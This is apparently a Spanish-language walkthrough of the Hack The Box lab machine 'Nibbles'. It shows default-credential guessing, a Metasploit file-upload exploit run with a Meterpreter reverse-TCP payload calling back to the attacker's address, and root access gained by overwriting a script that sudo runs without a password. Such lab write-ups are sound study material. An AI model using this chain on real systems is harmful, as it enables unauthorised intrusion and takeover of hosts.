Mi primera live box hoy es 31/05/18, publicada el 2/feb porque se publicó el fin de semana.
Por el nombre podemos asumir que se trata de nibbleblog
Sparta te dice que solo hay 2 puertos 80 y 22
si vamos al 80 y vemos el codigo fuente podemos ver que nos manda al folder de nibbleblog
y el default admin es admin.php
el usuario lo puedes adivinar es admin y el password igual… nibbles. ….
desde ahi puedes activar metasploit.
msf > use exploit/multi/http/nibbleblog_file_upload msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75 msf exploit(multi/http/nibbleblog_file_upload) > show payloads msf exploit(multi/http/nibbleblog_file_upload) > set payload php/meterpreter_reverse_tcp msf exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.9 msf exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/ msf exploit(multi/http/nibbleblog_file_upload) > run y ya tenemos una meterpreter de ahi a cd home/"user"/user.txt
Ahora subí Linenum
meterpreter > upload /usr/share/linenum/LinEnum.sh meterpreter > shell Process 1543 created. Channel 2 created. chmod +x LinEnum.sh ./LinEnum.sh ----------------------------------- [+] We can sudo without supplying a password! Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh [+] Possible sudo pwnage! /home/nibbler/personal/stuff/monitor.sh -------
hay una forma de concatenar a un archivo (>>) y hay forma de borrar todo lo que habia y dejar solo tu informacion con echo “algo” (sin comillas) > archivo.
echo cat /root/root.txt > monitor.sh ./monitor.sh cat: /root/root.txt: Permission denied sudo ./monitor.sh
despues de un rato sale la flag y todos somos felices con mi primera maquina que me dio puntos 🙂